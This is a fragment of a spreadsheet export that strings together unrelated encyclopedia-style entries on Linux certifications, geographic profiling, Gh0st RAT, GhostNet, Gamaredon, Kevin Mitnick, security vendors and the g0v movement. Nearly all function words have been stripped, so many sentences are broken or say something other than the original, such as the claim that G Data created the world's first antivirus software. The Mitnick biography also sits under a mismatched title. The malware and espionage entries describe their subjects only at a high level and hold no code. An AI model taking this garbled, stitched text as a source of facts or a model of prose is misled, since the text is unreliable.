reality complex since offender multiple spatial anchor points, home, workplace residence significant other. tools geographic profiling investigative tool seen strategic information management system assist police large volume information throughout investigation. concentrates focus geographic aspects crime developed response demands solving serial crimes. response, rossmo developed computerized geographic profiling algorithm called criminal geographic targeting (cgt) assess spatial characteristics crimes. analyzes geographic coordinates offender's crimes produces color assigns probabilities different points likely area offender's home base. patented integrated specialized crime analysis software product called rigel. rigel product developed software company environmental criminology research inc. (ecri), rossmo co-founded.geographic profilers often employ tools rigel, crimestat gemini perform geographic analysis. system inputs crime location addresses coordinates, often entered geographic information system (gis). output jeopardy surface (three-dimensional probability surface) color geoprofile, depicts likely areas offender residence search base. these programs assist crime analysts investigators focus resources effectively highlighting crucial geographic areas. geographic profiling analysis (gpa) training geographic profiling sub-type offender criminal profiling (the inference offender characteristics offence characteristics). therefore related psychological behavioral profiling. psychological profiling "who," geographic profiling "where." certified geographic profilers members international criminal investigative analysis fellowship (iciaf), professional profiling organization first begun investigators trained mid-1980s. geographic profiling analysis (gpa) training programme also created governed committee training certification (cgpatc). program designed geographic profiling analysis remains recognized enforcement tool; meaningful certification crime analysts detectives; standard quality adequate qualifications enforcements maintained; finally establish ethical code conduct. limitations although geographic profiling useful tool assisting investigations, e.g. prioritizing suspects, like models certain limitations: benefit case single crime limited. useful impulsive crimes impulsive offenders. distinguish multiple offenders operating area following similar modi operandi. although computer systems highly sophisticated, cannot analyze information involved crime series good accuracy algorithms' underlying assumptions. crimes lucrative targets residential location perpetrator small significance compared location target. also rossmo's formula, geographic profiling formula predict serial criminal lives environmental criminology research inc., developer rigel, software package utilizes rossmo's formulageneral: crime mapping offender profiling notes references brantingham, brantingham, (1984). patterns crime. york: macmillan. canter, (2003). mapping murder: secrets geographic profiling. london: virgin publishing. hicks, sales, (2006). "criminal profiling: developing effective science practice"washington, american psychological association holmes, holmes, (1996). "profiling violent crimes: investigative tool" (2nd ed). california: sage publication. laukkanen, (2007). "geographic profiling: using home crime distances crime features predict offender home location." akademi university. lersch, (2007). "space, time crime" (2nd ed). north carolina: carolina academic press mackay, (1999, december). geographic profiling: tool enforcement. police chief, 51–59. meaney, (2004). "commuters marauders: examination spatial behaviour serial criminals". australia: journal investigative psychology offender profiling, 121–137. rossmo, (2000). geographic profiling. boca raton, press. wortley, mazerolle, (2008). "environmental criminology crime analysis". willan publishing. external links institute canadian urban research studies texas state university center geospatial intelligence investigation</t>
  </si>
  <si>
    <t>Linux Professional Institute Certification Programs</t>
  </si>
  <si>
    <t>linux professional institute (lpi) offers three different certification tracks. core certification program, linux professional, contains three different levels addressing distinct aspects linux system administration. organization also offers introductory essentials program beginners linux open source, well open technology track professionals working additional technologies devops bsd. availability validity certifications exams delivered onsite linux open source events, network test centres pearson vue. validity certification years. exception linux essentials certificate, lifetime validity. essentials track essentials program created candidates starting career open source wish test level linux knowledge. linux essentials linux essentials entry level certificate introduced 2012. exam tests candidate’s ability basic command line editor demonstrate understanding processes, programs components linux operating system. linux professional certification track linux professional certification program consists lpic-1, lpic-2, lpic-3 certifications. lpic-1 lpic-2 certifications focusing linux system administration. lpic-3 level certifications several specialities: lpic-3 security, lpic-3 mixed environments lpic-3 virtualization high availability lpic-1 lpic-2 certifications require passing exams, lpic-3 level certification requires passing single exam. each exam series topics make exam objectives. each objective associated weight corresponds frequency exam questions objective. linux professional institute lpic-1 lpic-1 first published january 2000 originally called linux server professional (lpic-1). certification revised 2005, 2012, 2015 2018.to awarded lpic-1 certification candidate must successfully pass exams, 102. these taken order. lpic-1 certifies ability perform maintenance tasks command line, install configure computer running linux able configure basic networking. previously exam split alternative exams, including questions package manager, (file format). after update 2005 merged single exam, candidates expected know topics. lpic-1 exam topics system architecture linux installation package management unix commands devices, linux filesystems, filesystem hierarchy standard lpic-1 exam topics shells shell scripting user interfaces desktops administrative tasks essential system services networking fundamentals security linux professional institute lpic-2 lpic-2 second certification lpi’s multi-level professional certification program. this certification first published november 2001 name linux network professional (lpic-2). lpic-2 certification revised 2013 february 2017. lpic-2 certifies ability administer small medium–sized mixed networks, supervise assistants advise upper management. prerequisites: candidate must active lpic-1 certification receive lpic-2 certification, lpic-1 lpic-2 exams taken order. lpic-2 exam topics capacity planning linux kernel system startup filesystem devices advanced storage device administration networking configuration system maintenance lpic-2 exam topics domain name server http services file sharing network client management e-mail services system security linux professional institute lpic-3 lpic-3 certification program designed enterprise-level linux professional represents highest level lpi's linux professional certification track. lpic-3 program consists single exam area specialty; lpic-3 mixed environment, lpic-3 security lpic-3 high availability virtualization. order receive lpic-3 certification, candidate must active lpic-2 certification, lpic-2 lpic-3 exams taken order. passing least series specialty exams (300, 304) leads lpic-3 certification. lpic-3 mixed environments lpic-3 mixed environments certification covers administration linux systems enterprise-wide mixed environment. lpic- exam topics detailed objectives: samba basics samba active directory domains samba share configuration samba client configuration linux identity management file sharing lpic-3 security lpic-3 security certification covers administration linux systems enterprise-wide emphasis security. lpic- exam topics topics: cryptography host security access control network security threats vulnerability assessment lpic-3 virtualization high availability lpic-3 virtualization high availability certification covers administration linux systems enterprise-wide emphasis virtualization high availability. lpic- exam topics topics: virtualization high availability cluster management high availability cluster storage lpic-3 virtualization containerization lpic-3 virtualization containerization certification covers administration linux systems enterprise-wide emphasis virtualization containerization. lpic- exam topics topics: full virtualization container virtualization deployment provisioning lpic-3 high availability storage clusters lpic-3 high availability storage clusters certification covers administration linux systems enterprise-wide emphasis high availability systems storage. lpic- exam topics topics: high availability cluster management high availability cluster storage high availability distributed storage single node high availability open technology track linux professional institute devops tools engineer linux professional institute devops tools engineer published october 2017. exam tests proficiency open source tools configuration automation container virtualization, used implement devops collaboration model. linux professional institute specialist linux professional institute specialist certification focuses practical skills required work successfully freebsd, netbsd, openbsd environment, tests knowledge skills needed administer operating systems. also linux foundation linux certification certification ubuntu professional certification comptia linux+ project management institute (isc)² certified information systems security professional references external links linux professional institute pearson wiki link</t>
  </si>
  <si>
    <t>Gh0st RAT</t>
  </si>
  <si>
    <t>gh0st trojan horse windows platform operators ghostnet used hack many sensitive computer networks. cyber spying computer program. "rat" part name refers software's ability operate "remote administration tool". ghostnet system disseminates malware selected recipients computer code attached stolen emails addresses, thereby expanding network allowing computers infected. according infowar monitor (iwm), "ghostnet" infection causes computers download trojan known "gh0st rat" allows attackers gain complete, real-time control. such computer controlled inspected hackers, software even ability turn camera audio-recording functions infected computer capabilities, enabling monitors hear goes room. also computer surveillance computer insecurity cyber-security regulation cyber-warfare proactive cyber defence surveillance espionage phishing references walton, gregory (april 2008). "year gh0st rat". world association newspapers. archived original 2009-08-11. retrieved 2009-04-01. external links information warfare monitor tracking cyberpower (university toronto, canada/munk centre)</t>
  </si>
  <si>
    <t>Linux Foundation Linux Certification</t>
  </si>
  <si>
    <t>linux foundation linux certification (lflc) certification program system administrators engineers working linux operating system, announced linux foundation august 2014.linux foundation certifications valid years. candidates option retake pass exam keep certification valid. certification become valid years starting date exam retaken passed. candidates also keep certification valid completing renewal requirement options below. renewal requirements must completed prior expiration certification. renewal requirements satisfied, expiration certification extended years. date extension takes effect becomes renewal date certification. renewal requirements completed renewal date certification carry period. linux foundation certified system administrator (lfcs) linux foundation certified system administrator (lfcs) certification provides assurance recipient knowledgeable linux, especially relation terminal. linux foundation certified engineer (lfce) linux foundation certified engineer (lfce) certification provides assurance recipient knowledgeable management design linux systems. certified kubernetes security specialist (cks) july 2020, linux foundation announced kubernetes certification, certified kubernetes security specialist. obtaining require performance-based certification exam. also linux professional institute certification ubuntu professional certification references external links "linux certification". linux foundation. august 2014. retrieved august 2014.</t>
  </si>
  <si>
    <t>Ghost Security</t>
  </si>
  <si>
    <t>ghost security, also known ghostsec, self-described "vigilante" group formed attack isis websites promote islamic extremism. considered offshoot anonymous hacking collective. according experts online jihad activism, group gained momentum charlie hebdo shooting paris january 2015. group claims taken hundreds isis-affiliated websites social media accounts thwarted potential terrorist attacks cooperating enforcement intelligence agencies. group uses social media hashtags like #ghostsec #ghostsecurity #opisis promote activities.on november 2015, anonymous posted video announcing "biggest operation ever" terrorist group response attacks paris, taking 3,824 pro-isis twitter accounts doxxing recruiters. message posted isis-affiliated account encrypted chat service telegram replied defiantly anonymous providing instructions respond potential cyberattack. november, isis wordpress dark site reportedly hacked ghostsec, replaced site advert prozac.ghostsec found information related planned terrorist attacks york tunisia passed information enforcement authorities. wake cooperation enforcement, ghostsec decided "become legit" efficiently combat isis. group renamed "ghost security group" november 2015 ended association anonymous. those members opposed development re-formed name "ghostsec" maintained anonymous ties. both groups continue operate isis.lara abdallat members ghost security group whose identity public. also timeline events associated anonymous katiba narvalos references</t>
  </si>
  <si>
    <t>Linoma Software</t>
  </si>
  <si>
    <t>linoma software developer managed file transfer encryption solutions. company acquired helpsystems june 2016. mid-sized companies, large enterprises government entities linoma's (now helpsystems's) solutions protect sensitive data comply data security regulations dss, hipaa/hitech, sox, glba state privacy laws. linoma's software runs variety platforms including windows, linux, unix, aix, solaris, hp-ux history linoma group, inc. (the parent company linoma software) founded 1994. company started lincoln, nebraska robert christina luebbe. throughout 1990s, linoma group performed consulting contract programming services organizations nebraska/iowa area. linoma software formed 1998 address needs as/400 platform (now known developing productivity tools help departments users. these tools sold throughout world helped linoma establish innovative software company. 2002, linoma released transfer anywhere, solution automating managing file transfers as/400. over next years, linoma added encryption capabilities transfer anywhere including support open encryption, sftp ftps. these encryption capabilities helped organizations protect sensitive data transmissions network payments, direct deposits, financial data, credit card authorizations, personally identifiable information (pii) confidential data. linoma expanded platforms completely redesigned transfer anywhere open solution graphical browser-based interface, renaming goanywhere director. released early 2008, goanywhere director included comprehensive security controls, management, trading partner wizards detailed audit trails compliance requirements. 2009, linoma released goanywhere services collection secure file services including server, ftps server, sftp server https server. goanywhere director services merged 2015 become goanywhere mft. goanywhere merged workflow automation capabilities (adapted goanywhere director) secure server collaboration features (adapted goanywhere services). this provides unified browser-based interface, centralized logging reporting. goanywhere managed file transfer software category products, also used functions. goanywhere gateway released 2010 enhanced reverse proxy protect help organizations meet strict compliance requirements. goanywhere gateway enhanced 2011 provide forward proxy functions. linoma software also performs encryption data rest platform crypto complete product. this product also includes management, security controls audit trails compliance. june 2016, minneapolis, minnesota-based helpsystems acquired linoma software.in march 2019, goanywhere mft, combination clearswift’s icap adaptive redaction product, named security solution year finalist european software excellence awards 2019. certifications associations software goanywhere goanywhere managed file transfer solution exchange data systems, employees, customers trading partners. provides single point control security settings, detailed audit trails reports. data transfers secured using protocols servers (ftps, sftp, scp) servers (https as2). supports popular encryption protocols offers nist-certified fips 140-2 validated encryption module. goanywhere mft's interface workflow features help eliminate need custom programs/scripts, single-function tools manual processes traditionally needed. this improves quality file transfers helps organizations comply data security policies regulations. with integrated support clustering, goanywhere process high volumes file transfers enterprises load balancing processes across multiple systems. clustering technology goanywhere also provides active-active automatic failover disaster recovery. secure email module also available allows users send messages files secure packages. recipients receive email unique link package allows view download files secure https connection. there limit file size type, package subject password protection well security features. goanywhere agents lightweight applications automate file transfers workflows remote on-premises systems throughout enterprise. agents managed central deployment goanywhere mft, allowing users configure schedule agent file transfers business processes browser-based interface. integration cloud applications, goanywhere offers cloud connectors, built-in integrations help users automatically move data applications like sharepoint salesforce. designer interface software also makes possible users build custom connectors. godrive goanywhere godrive on-premise solution provides enterprise file sync sharing (efss) services employees partners. godrive files folders easily shared users advanced collaboration features including file revision tracking, commenting, trash bin, media viewing synchronization windows devices. godrive alternative cloud-based file sharing services. provides on-site file storage localized control, end-to-end encryption, detailed audit trails. end-user device lost stolen, godrive data deactivated wiped remotely. goanywhere gateway goanywhere gateway provides additional layer network security masquerading server identities exchanging data trading partners. application store user credentials data local network. when using reverse proxy, inbound ports need opened private network, essential compliance dss, hipaa, hitech, sox, glba state privacy laws. current version 2.0.1. reverse proxy used application file-sharing services (for example, ftp/s, sftp, http/s servers) front-ends dmz. goanywhere gateway's service broker binds file transfer requests appropriate service private network secure control channel. goanywhere gateway makes connections external systems behalf users applications private network. routing outbound requests centralized point helps manage file transfers firewall. this method keeps inbound ports closed. forward proxy hides identities locations internal systems security purposes. goanywhere openpgp studio goanywhere openpgp studio free desktop tool protects sensitive files using openpgp encryption standard. documents encrypted, decrypted, signed verified workstation using tool. integrated manager allows users create, import, export manage openpgp keys needed encrypt decrypt files. goanywhere openpgp studio almost operating system including windows, linux, solaris unix. crypto complete crypto complete program protects sensitive data using strong encryption, tokenization, integrated management, auditing. this software encrypts database fields, automatically encrypt files. application also locates sensitive information encrypted using fnddbfld utility, available cost users. current version 3.3.0. management system integrated within crypto complete policy controls, encryption functions auditing facilities. along integrated security native access maintenance/usage activities controlled help meet compliance requirements. backup encryption component encrypts data written tape devices. crypto complete encrypts backups user data libraries, objects, files. field encryption registry works ibm's field procedures remembers fields database encrypted. this process automated whenever data added field. when data decrypted, returned values masked displayed based authority user. tokenization process replacing sensitive data unique identification numbers (tokens) storing original data central server (typically encrypted form). tokenization help thwart hackers minimize scope compliance audits stored single central location. tokenization used protect sensitive data like credit card personal account numbers (pan), bank account numbers, social security numbers, driver's license numbers personally identifiable information (pii). surveyor/400 productivity suite working data, files, libraries, objects. surveyor/400 operates front-end, provides options either 5250 "command line" emulation. current version 4.0.4. toolbox toolbox developed help developers upgrade older system/36 code os/400 standard. program allows developers save code "snippets" re-use testing. current version 4.06 platforms goanywhere applications vmware ready operate virtualized static environment following operating systems. also comparison server software notes external reviews/links business wire goanywhere servicesfour hundred stuff crypto complete</t>
  </si>
  <si>
    <t>Ghost in the Wires</t>
  </si>
  <si>
    <t>kevin david mitnick (born august 1963) american computer security consultant, author, convicted hacker. best known high-profile 1995 arrest five years prison various computer communications-related crimes.mitnick's pursuit, arrest, trial, sentence along associated journalism, books, films controversial.he runs security firm mitnick security consulting, llc. also chief hacking officer part owner security awareness training company knowbe4, well active advisory board member zimperium, firm develops mobile intrusion prevention system. early life education mitnick born nuys, california, august 1963. grew angeles attended james monroe high school angeles, california, time became amateur radio operator chose nickname condor watching movie three days condor. later enrolled angeles pierce college usc. time, worked receptionist stephen wise temple. career computer hacking mitnick driver tell could ticket punch school project", able ride greater area using unused transfer slips found dumpster next company garage.mitnick first gained unauthorized access computer network 1979, friend gave phone number ark, computer system digital equipment corporation (dec) used developing rsts/e operating system software. broke dec's computer network copied company's software, crime charged convicted 1988. sentenced months prison followed three years supervised release. near supervised release, mitnick hacked pacific bell voicemail computers. after warrant issued arrest, mitnick fled, becoming fugitive two-and-a-half years.according u.s. department justice, mitnick gained unauthorized access dozens computer networks fugitive. used cloned cellular phones hide location and, among things, copied valuable proprietary software country's largest cellular telephone computer companies. mitnick also intercepted stole computer passwords, altered computer networks, broke read private e-mails. arrest, conviction, incarceration after well-publicized pursuit, arrested mitnick february 1995, apartment raleigh, north carolina, federal offenses related two-and-a-half-year period computer hacking included computer wire fraud. found cloned cellular phones, cloned cellular phone codes, multiple pieces false identification.in december 1997, yahoo! website hacked, displaying message calling mitnick's release. according message, recent visitors yahoo!'s website infected computer worm would wreak havoc christmas unless mitnick released. yahoo! dismissed claims hoax said worm nonexistent.mitnick charged wire fraud counts), possession unauthorized access devices counts), interception wire electronic communications, unauthorized access federal computer, causing damage computer.in 1999, mitnick pleaded guilty four counts wire fraud, counts computer fraud, count illegally intercepting wire communication, part plea agreement united states district court central district california angeles. sentenced months prison plus months violating terms 1989 supervised release sentence computer fraud. admitted violating terms supervised release hacking pacific bell voicemail systems associating known computer hackers, case co-defendant lewis payne.mitnick served five years prison—four-and-a-half years' pre-trial eight months solitary confinement—because, according mitnick, enforcement officials convinced judge ability "start nuclear whistling phone", implying enforcement told judge could somehow dial norad modem payphone prison communicate modem whistling launch nuclear missiles. addition, number media outlets reported unavailability kosher meals prison incarcerated.he released january 2000. during supervised release, ended january 2003, initially forbidden communications technology landline telephone. under plea deal, mitnick also prohibited profiting films books based criminal activity seven years, special judicial variation. december 2001, judge ruled mitnick sufficiently rehabilitated possess federally issued amateur radio license. mitnick runs mitnick security consulting llc, computer security consultancy part owner knowbe4, provider integrated platform security awareness training simulated phishing testing. controversy mitnick's criminal activities, arrest, trial, along associated journalism, controversial. though mitnick convicted copying software unlawfully, supporters argue punishment excessive many charges fraudulent based actual losses.in 2002 book, deception, mitnick states compromised computers solely using passwords codes gained social engineering. claims software programs hacking tools cracking passwords otherwise exploiting computer phone security.john markoff tsutomu shimomura, part pursuit mitnick, wrote book takedown mitnick's capture.the case mitnick tested laws enacted dealing computer crime, raised public awareness security involving networked computers. controversy remains, however, mitnick story often cited today example influence newspapers media outlets enforcement personnel. consulting since 2000, mitnick paid security consultant, public speaker, author. security consulting for, performs penetration testing services, teaches social engineering classes companies government agencies. company mitnick security consulting based vegas, nevada currently resides. media 2000, skeet ulrich russell wong portrayed kevin mitnick tsutomu shimomura, respectively, movie track down (known takedown outside us), based book takedown john markoff tsutomu shimomura. released september 2004. 2001 documentary named freedom downtime produced 2600: hacker quarterly response takedown.mitnick's story partial inspiration wizzywig, piskor's graphic novel hackers.mitnick also appeared werner herzog's documentary behold, reveries connected world (2016). books written mitnick mitnick co-author, william simon robert vamosi, four books, three computer security autobiography: (2003) deception: controlling human element security (2005) intrusion: real stories behind exploits hackers, intruders deceivers (2011) ghost wires: adventures world's most wanted hacker (2017) invisibility authorized mitnick (1996) fugitive game: online kevin mitnick. book author jonathan littman presented mitnick's account story, john markoff's book takedown (1996) jeff goodell's cyberthief samurai (1996) presented shimomura's side (when mitnick legally unable publish profit story). also kevin poulsen kung stronger yours" list computer criminals secret history hacking references bibliography movies freedom downtime imdb books articles external links official website kevin mitnick interviewed show triangulation twit.tv network</t>
  </si>
  <si>
    <t>Linux Professional Institute</t>
  </si>
  <si>
    <t>linux professional institute (lpi) non-profit organization founded canada october 1999, oriented towards certifications linux, open source software based technologies. linux professional institute certification programs company offers exams numerous countries languages. these exams primarily multiple choice questions, written answers. these either taken using computer based system, using paper based exam. organization allows community participation creating updating exams. persons unaffiliated company exam objectives development wiki, exam development mailing list participate creation exams update existing ones. exams intended distribution-neutral rather emphasize particular distribution family thereof. three different certification program tracks: essentials track: linux professional institute linux essentialslinux professional track: linux professional institute lpic-1 linux professional institute lpic-2 linux professional institute lpic-3open technology track: linux professional institute devops tools engineer linux professional institute specialist linux professional institute partner programs linux professional institute's partner programs created assist companies organizations involved teach open source. organization linux professional institute inc. incorporated canadian non-profit organization october 1999. headquartered near toronto, ontario, canada. board directors. members board are: "maddog" hall (chairman), christopher (duffy) fron, torsten scheck, bryan smith, dorothy gordon, (vicky) brasseur, klaus knopper, mark phillips, uira ribeiro thiago sobral. exams exams normally administered linux professional institute inc., instead pearson test centres online onvue. number exams also offered major linux trade shows conferences, exams often available reduced price. beta exams offered part community feedback process free charge. international regional partners seeks increase adoption linux part terms "regional enablement initiative" focuses identifying partner organizations adopt otherwise promote adoption. recertification policy changed recertification policy three times founding. first recertification policy, september 2004, decided introduce ten-year recertification policy. certification designations earned september 2004, considered lifetime designations affected policy. again december 2006, reduced recertification policy period five years. candidates earned lpic certifications re-certify every five years alternatively earn higher certification status even certification earned prior september 2004. however, certification designations earned prior september 2003, considered active certifications september 2008. also free open source software project management institute isc² certified information systems security professional references external links linux professional institute mailing lists exam practice resources linux professional institute learning materials</t>
  </si>
  <si>
    <t>GhostNet</t>
  </si>
  <si>
    <t>ghostnet (simplified chinese: 幽灵网; traditional chinese: 幽靈網; pinyin: yōulíngwǎng) name given researchers information warfare monitor large-scale cyber spying operation discovered march 2009. operation likely associated advanced persistent threat, network actor spies undetected. command control infrastructure based mainly people's republic china ghostnet infiltrated high-value political, economic media locations countries. computer systems belonging embassies, foreign ministries government offices, dalai lama's tibetan exile centers india, london york city compromised. discovery ghostnet discovered named following 10-month investigation infowar monitor (iwm), carried researchers approached dalai lama's representative geneva suspecting computer network infiltrated. composed researchers secdev group canadian consultancy citizen lab, munk centre international studies university toronto; research findings published infowar monitor, affiliated publication. researchers university cambridge's computer laboratory, supported institute information infrastructure protection, also contributed investigation three locations dharamshala, tibetan government-in-exile located. discovery 'ghostnet', details operations, reported york times march 2009. investigators focused initially allegations chinese cyber-espionage tibetan exile community, instances email correspondence data extracted.compromised systems discovered embassies india, south korea, indonesia, romania, cyprus, malta, thailand, taiwan, portugal, germany pakistan office prime minister laos. foreign ministries iran, bangladesh, latvia, indonesia, philippines, brunei, barbados bhutan also targeted. evidence found u.s. government offices infiltrated, although nato computer monitored half computers indian embassy washington, d.c., infiltrated.since discovery, ghostnet attacked government networks, example canadian official financial departments early 2011, forcing off-line. governments commonly admit attacks, must verified official anonymous sources. technical functionality emails sent target organizations contain contextually relevant information. these emails contain malicious attachments, opened, enable trojan horse access system. this trojan connects back control server, usually located china, receive commands. infected computer execute command specified control server. occasionally, command specified control server cause infected computer download install trojan known gh0st allows attackers gain complete, real-time control computers running microsoft windows. such computer controlled inspected attackers, software even ability turn camera audio-recording functions infected computers, enabling attackers perform surveillance. origin researchers stated could conclude chinese government responsible network. however, report researchers university cambridge says believe chinese government behind intrusions analyzed office dalai lama.researchers also noted possibility ghostnet operation private citizens china profit patriotic reasons, created intelligence agencies countries russia united states. chinese government stated china "strictly forbids cyber crime."the "ghostnet report" documents several unrelated infections tibetan-related organizations addition ghostnet infections. using email addresses provided report, scott henderson managed trace operators infections (non-ghostnet) chengdu. identifies hacker 27-year-old attended university electronic science technology china, currently connected chinese hacker underground.despite lack evidence pinpoint chinese government responsible intrusions tibetan-related targets, researchers cambridge found actions taken chinese government officials corresponded information obtained computer intrusions. incident involved diplomat pressured beijing receiving email invitation visit dalai lama representatives.another incident involved tibetan woman interrogated chinese intelligence officers shown transcripts online conversations. however, possible explanations event. drelwa uses instant messengers communicate chinese internet users. 2008, found tom-skype, chinese version skype, logging storing text messages exchanged users. possible chinese authorities acquired chat transcripts means.iwm researchers also found detected, ghostnet consistently controlled addresses located island hainan, china, pointed hainan home lingshui signals intelligence facility third technical department people's liberation army. furthermore, ghostnet's four control servers revealed government server. also advanced persistent threat chinese intelligence activity abroad chinese cyberwarfare chinese espionage united states cyber-warfare economic industrial espionage honker union internet censorship china operation aurora redhack (from turkey) titan rain shadow network 14th dalai lama references external links secdev group citizen university toronto tracking ghostnet: investigating cyber espionage network (infowar monitor report (secdev citize lab), march 2009) f-secure mirror report information warfare monitor tracking cyberpower (university toronto, canada/munk centre) twitter: infowarmonitor kelly, cathal (march 2009). "cyberspies' code click away simple google search quickly finds link software ghost program used target governments". toronto star (canada). toronto, ontario, canada. retrieved april 2009. lee, peter (april 2009). "cyber-skirmish world". asia times online. archived original april 2009. retrieved april 2009.{{cite web}}: maint: unfit (link) bodmer, kilger, carpenter, jones (2012). reverse deception: organized cyber threat counter-exploitation. york: mcgraw-hill osborne media. isbn 0071772499, isbn 978-0071772495</t>
  </si>
  <si>
    <t>List of Kiosk software</t>
  </si>
  <si>
    <t>this list kiosk software. list includes kiosk-exclusive software well mobile device management software kiosk features. general information references</t>
  </si>
  <si>
    <t>Gamaredon</t>
  </si>
  <si>
    <t>gamaredon, also known primitive bear actinium microsoft) russian advanced persistent threat active since least 2013. motivation cyber espionage appears main goal group,; unlike apts, gamaredon broadly targets users globe addition also focusing certain victims, especially ukrainian organizations) appears provide services apts. example, invisimole threat group attacked select systems gamaredon earlier compromised fingerprinted. tactics group frequently uses spear phishing techniques malicious code attachments download remote templates containing malware.malware used group includes pterodo, powerpunch, obfumerry, obfuberry, dilongtrash, dinotrain, desertdown. ukraine january 2022, attempted compromise western government entity ukraine. also cyberwarfare russia russian–ukrainian cyberwarfare references</t>
  </si>
  <si>
    <t>Future Fibre Technologies</t>
  </si>
  <si>
    <t>future fibre technologies (fft) fiber optic sensing technologies company based melbourne, australia, head office mountain view, california, middle east head office dubai, indian head office delhi european head office london. founded 1994, future fibre technologies product line provides optical fiber intrusion detection systems perimeters, buried pipelines data communication networks. currently hold number patents fiber optic sensor signal processing technologies, recognized global tier supplier global perimeter intrusion market.fft listed australian securities exchange (asx: fft). history established melbourne, australia 1994 research development company. 1998, response demand cost-effective, optical fiber sensors protect large perimeters, buried pipelines physical network communication links, developed technology could pinpoint location intrusions many miles deployed optical fiber. first products based technology commercialised 2002, providing fiber optic sensor intrusion detection system capacity detect perimeter intrusion within metres kilometres deployed fiber optic cable single system. subsequently, developed patented advanced recognition discrimination (arad) technology, overcame problem nuisance alarms. advanced artificial intelligence technology uses signature recognition signal processing software identify difference environmental event attempted intrusion, reducing effect nuisance alarms.this hundreds installations throughout world, notable installations unlimited technologies dulles international airport, military jfpass, critical naval, infrastructure airport site perimeters.this success receiving notable industry awards, 2009 2010 governor victoria export award, 2009 2010 government security news “best perimeter protection product” award 2010 prime minister's australian exporter year award. references external links perimeter security home page fibre optic</t>
  </si>
  <si>
    <t>G Data CyberDefense</t>
  </si>
  <si>
    <t>data cyberdefense (until september 2019 data software german software company focuses computer security. company founded 1985 headquartered bochum. they known creators world's first antivirus software. data multiple scanning engines; developed in-house bitdefender engine. data provides several security products targeted home business markets. company north american subsidiary located newark, delaware. history data founded bochum, germany 1985. company introduced first computer security product anti-virus (avk) 1988 atari st.beside focus security market, data also created software voice recognition (invox) speech synthesis (logox).g data computer security products scan-engines, originally avast bitdefender. 2014 release introduced scan-engine (closegap), replaced avast. however, upgrade version painless, users weaker computers experienced system slowdowns. company promptly solved issue update.in september 2015, data launched messaging called secure chat used signal protocol. application based fork signal source code published gplv3 license. data discontinued service 2018. features some features data's solutions support are: safe surfing safe shopping safe emailing chatting protection spyware safe online banking blocks spam protection hacking parental controls data backup data recovery security tuning data safe device control safe emailing chatting bankguard versions home securityantivirus internetsecurity totalsecurity antivirus macbusiness securityantivirus business antivirus enterprise clientsecurity business clientsecurity enterprise endpointprotection business endpointprotection enterprise mailsecurity patchmanagementmobile security awards tests av-comparatives.orggold award highest detection rate products tested (99.7%) gold award highest proactive detection rate new/unknown malware (~61%, false positives)ipacso innovation framework ict-securityinnovative cyber security company also comparison antivirus software comparison computer viruses references</t>
  </si>
  <si>
    <t>G0v</t>
  </si>
  <si>
    <t>movement, g0v, (pronounced gov-zero open source, open government collaboration started chia-liang ("clkao"), ipa, kirby others late 2012 taiwan.originally driven bimonthly hackathon, community expanded include different professional non-information technology background members. symbolizing community's efforts "rethink role government zero," borrowing parlance binary digital world "gov" replaced make "g0v"; many government agencies taiwan urls ending .gov.tw, replacing .gov .g0v redirects user so-called shadow government, "forked" version agency contributions civic hackers. continuing inspiration software development world, forked content "merged" back government agency's website. community promotes transparency government information committed developing information platforms tools citizens participate society. beginning 2014, contributors across three continents, results released free software model embraces knowledge sharing. origin "real price" incident amidst popular unrest regarding speculative housing inflation, taiwanese president ying-jeou made housing justice component 2012 re-election platform. attempt counter speculation enable fair taxation, parliament passed bipartisan bill mandating real estate transactions register actual price. part mandate, ministry interior commissioned website people find transaction records street address. site went live october flood requests remained intermittently accessible october. three days launch, team four google.tw engineers incorporated ministry's data real-price maps website, overlaying aggregated pricing information google maps plethora filtering features. their remix well-received, successfully serving hundreds requests second google engine. week later, minister without portfolio simon chang google alum himself) invited remixers round table. team responded amiably, offering detailed suggestions would like collaborate government. however, media coverage pitted team's shoestring budget ntd$500 official site's “million-dollar disaster”, relationship soon turned sour. ministry claimed crawling activity contributed server's downtime, critics engineers' overlay questioned legality scraping remixing government data. incident came head november official site replaced street addresses image files, dramatically increasing burden crawling. despite fact civic hacker eventually published parsed data using techniques, real-price maps site closed shortly thereafter. "power-up plan economy" while real price incident still unfolding, government production took spotlight: 40-second video advertisement titled “what's economy power-up plan?” critics found advertisement, "entirely devoid information, clip simply repeated following monotonous refrain: complex plan. complicated explain. never mind details follow instructions along it!'"the video faced criticism public, went viral; many viewers youtube protested advertisement clicking “report abuse" video. automated system quickly classified video spam banned government's youtube account days. video went on-air october yahoo! open hack 2012, annual 24-hour event teams demonstrate innovative creations. infuriated controversial four members “hacker #15” team made last-minute pivot “online window shopping” project. rather displaying merchandise, resolved create bird's-eye view taxes spent. resulting budget maps project presented agency's annual spending form geometric shapes proportional sizes, inviting participants review rate item's usefulness. calling upon citizens “strike rip-off spending (e.g. power-up ad)”, two-minute demo ntd$50,000 hack prizes. attempt bolster interest future projects past demonstration day, team member registered domain name g0v.tw, dedicated citizens’ remixes government websites. real-price maps thus became accessible lvr.land.moi.g0v.tw shutdown, ascii character difference official counterpart lvr.land.moi.gov.tw; meanwhile, budget maps lived budget.g0v.tw inaugural g0v.tw project. hackath0n equipped g0v.tw domain, four hackers agreed spend ntd$50k prize hackathon enlist projects syndicate civic remixes. modeled participant-driven barcamp events, named event hackathon martial mobilization, hackath0n, invoking rebellious image taiwan's 1949-era civil war. registrants soon exceeded initial venue's capacity. director academia sinica offered host event institute information science. december civic hackers filled institute's 80-person auditorium presented projects, covering wide range government functions, including congress, tenders, geography, weather, electricity, healthcare many areas. discussion continued online hackpad well daylong event. support coding efforts, writers bloggers formed facebook group offering on-demand copywriting skills project asked assistance. designer even also initiated on-demand design group, providing hackers various visual assets. dissatisfied makeshift logo banner, would continue work several iterations logotypes, eventually completing visual identity guidelines aimed helping elevate easily recognizable brand. declaration states, "[we] demonstrated combine online offline activism. following model established free software community past decades, transformed social media platform social production, fully open decentralized cultural technological framework." summarizes collaborative governance philosophy thus: "ask nobody this. 'nobody'!" activities projects community activities online offline, including hackathons, speeches, sharing sessions, teaching, conference, activities. 2020 active communities working open government data taiwan hong kong. g0v.tw projects prominent applications widgets created include: moedict, digital chinese dictionary developed audrey tang cofacts, collaborative fact-checking disfactory, website reporting illegal factories farmland vtaiwan, online-offline open consultation process, used shape national legislation airmap, open source website companion hardware projects crowdsourcing pollution data g0vhk hong kong branch g0v, known g0vhk, founded 2016 data scientist wong. movement gained popularity hong kong work aggregating candidate information 2019 hong kong local elections disseminating disease prevention news 2019-20 coronavirus 